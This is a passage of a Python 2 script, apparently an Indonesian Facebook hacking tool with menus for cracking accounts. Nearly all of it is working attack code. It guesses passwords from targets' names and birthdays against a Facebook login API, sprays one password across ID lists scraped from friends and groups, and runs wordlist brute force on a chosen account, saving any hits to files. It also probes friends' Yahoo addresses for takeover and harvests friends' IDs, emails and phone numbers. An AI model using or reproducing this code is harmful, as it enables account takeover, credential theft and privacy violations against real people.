print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '234'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '1'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '234'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('allahuakbar')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.5)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '234'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' ==> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' ==> ' + b['name']
else:
pass2 = b['firs_name'] + '1'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' ==> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' ==> ' + ['name']
else:
pass3 = b['last_name'] + '234'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' ==> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' ==> ' + b['name']
else:
pass4 = b['last_name'] + '1'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' ==> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' ==> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' ==> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' ==> ' + b['name']
else:
pass6 = ('allahuakbar')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' ==> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' ==> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
